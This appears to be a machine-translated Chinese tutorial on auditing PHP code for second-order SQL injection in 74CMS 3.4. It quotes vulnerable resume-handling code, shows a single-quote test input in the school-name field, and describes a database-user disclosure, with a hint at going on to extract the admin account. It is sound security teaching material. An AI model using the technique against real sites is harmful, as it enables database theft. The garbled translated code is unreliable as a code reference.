"PHP Code Audit Example Tutorial" SQL injection-4. Global Protection Bypass Secondary injection

0x01 background

Today's web programs basically have a global filter for SQL injection, like PHP to open the GPC or on the global file common.php using the Addslashes () function to filter the received parameters, especially single quotes. Two injections is also a more common injection, it involves warehousing and out of the library. Because there is a global escape, when the storage:

Insert into table (username) VALUES (' hack\ ');

After this, the escape character disappears into hack ' so that if hack ' out of the library is brought into the query, it will successfully introduce a single quotation mark to cause injection.

The loophole comes from dark clouds:

http://www.wooyun.org/bugs/wooyun-2014-068362

0X02 Environment Construction

Look at the background we used the lower version of the 74CMS program, version 3.4 (20140310)

① Source online can search, I packed a copy: Http://pan.baidu.com/s/1c1mLCru

② Extract to www 74cms (20140310) directory, browser access to Http://localhost/74cms (20140310)), and then follow the prompts step by step installation, installation encountered problems please Baidu or Google, after successful visit such as:

0X03 Vulnerability Analysis

PART1: Source Structure

The structure of the source code is clear, should be the most clear audit structure, mainly has the following three pieces of content:

Index.php introduced the common.inc.php file, we followed common.inc.php, found the function of processing GPC:

if (!empty ($_get)) {$_get  = Addslashes_deep ($_get);} if (!empty ($_post)) {$_post = Addslashes_deep ($_post);} $_cookie   = Addslashes_deep ($_cookie); $_request  = Addslashes_deep ($_request);

As you can see, the server handles the variables for Get and POST requests as addslashes processing.

Part2: Audit process

1. First in the personal release of the resume:

ElseIf ($act = = ' Make4_save ') {$resume _education=get_resume_education ($_session[' uid '],$_request[' pid ']), if (count ( $resume _education) >=6) showmsg (' educational experience cannot exceed 6! ', 1, $link); $setsqlarr [' UID ']=intval ($_session[' uid ']), $setsqlarr [' pid ']=intval ($_request[' pid ']); if ($setsqlarr [' uid ']==0 | | $setsqlarr [' pid ']==0) showmsg (' parameter Error! ', 1); $setsqlarr [' Start ']=trim ($_post[' start '])? $_post[' Start ']:showmsg (' Please fill in the start time! ', 1, $link); $setsqlarr [' Endtime ']=trim ($_post[' Endtime ')? $_post[' Endtime ']:showmsg (' please fill in the end time! ', 1, $link); $setsqlarr [' School ']=trim ($_post[' school ')? $_post[' School ']:showmsg (' please fill in the school name! ', 1, $link); $setsqlarr [' Speciality ']=trim ($_post[' speciality ')? $_post[' speciality ']:showmsg (' please fill in the Professional name! ', 1, $link); $setsqlarr [' Education ']=trim ($_post[' education ')? $_post[' education ']:showmsg (' Please choose to get a diploma! ', 1, $link); $setsqlarr [' Education_cn ']=trim ($_post[' education_cn ')? $_post[' Education_cn ']:showmsg (' Please choose to get a diploma!    ', 1, $link); See here is an Insert table "qs_resume_education" operation, the educational background related to the field if (inserttable (' resume_education '), $setSqlarr)) {Check_resume ($_session[' uid '],intval ($_request[' pid ')]); 

2. Here you see Insert storage, you can try to add a single quotation mark, after the storage will eliminate the escape character. Let's go ahead and follow Inserttables's check_resume function

Check the degree of completion of the Resume function Check_resume ($uid, $pid) {Global $db, $timestamp, $_cfg; $uid =intval ($uid); $pid =intval ($PID); $ Percent=0, $resume _basic=get_resume_basic ($uid, $pid) $resume _intention= $resume _basic[' intention_jobs ']; $resume _ specialty= $resume _basic[' specialty '];//access to educational experience, out of the database $resume_education=get_resume_education ($uid, $pid); if (!empty ($resume _basic)) $percent = $percent +15;if (!empty ($resume _intention)) $percent = $percent +15;if (!empty ($resume _specialty)) $percent =$ Percent+15;if (!empty ($resume _education)) $percent = $percent +15;if ($resume _basic[' photo_img '] && $resume _ basic[' Photo_audit ']== "1" && $resume _basic[' Photo_display ']== "1") {$setsqlarr [' photo ']=1;} else{$setsqlarr [' Photo ']=0;}    if ($percent <60) {$setsqlarr [' complete_percent ']= $percent; $setsqlarr [' Complete ']=2;}    else{$resume _work=get_resume_work ($uid, $pid);    $resume _training=get_resume_training ($uid, $pid);    $resume _photo= $resume _basic[' photo_img ';    if (!empty ($resume _work)) $percent = $percent +13; if (!empty($resume _training))    $percent = $percent +13;    if (!empty ($resume _photo)) $percent = $percent +14;    $setsqlarr [' Complete ']=1;    $setsqlarr [' complete_percent ']= $percent;    Require_once (qishi_root_path. ' include/splitword.class.php ');    $SP = new Spword ();            $setsqlarr [' key ']= $resume _basic[' intention_jobs ']. $resume _basic[' Recentjobs ']. $resume _basic[' specialty ';    $setsqlarr [' key ']= ' {$resume _basic[' fullname '} '. $sp->extracttag ($setsqlarr [' key ']); $setsqlarr [' Key ']=str_replace (",", "", $resume _basic[' intention_jobs ']). " {$setsqlarr [' key ']}    {$resume _basic[' education_cn '} ";        $setsqlarr [' key ']= $sp->pad ($setsqlarr [' key ']); if (!empty ($resume _education)) {//Traverse education through all fields, add to the array foreach ($resume _education as $li) {$s        etsqlarr[' key ']= "{$li [' School '}} {$setsqlarr [' key ']} {$li [' speciality ']}"; }} $setsqlarr [' Refreshtime ']= $timestamp;} Here's an update on the education experience, two injections from this! Updatetable (Table (' Resume '), $setsqlarr, "Uid= ' {$uid} ' and id= ' {$pid} '");Pdatetable (Table (' resume_tmp '), $setsqlarr, "Uid= ' {$uid} ' and id= ' {$pid} '); 

3. We fill out a resume simple test, in the education experience of the school name field to fill AA '

After saving found Error statement:

0x04 Vulnerability Proof

To construct a POC that obtains information about a database user:

Check your resume to find the name of your resume root@localhost:

Review the SQL statement to discover that the UPDATE statement was executed successfully:

Finally, interested students can continue to get information about other related fields such as admin account.

Original address:

http://www.cnbraid.com/2016/02/19/sql3/

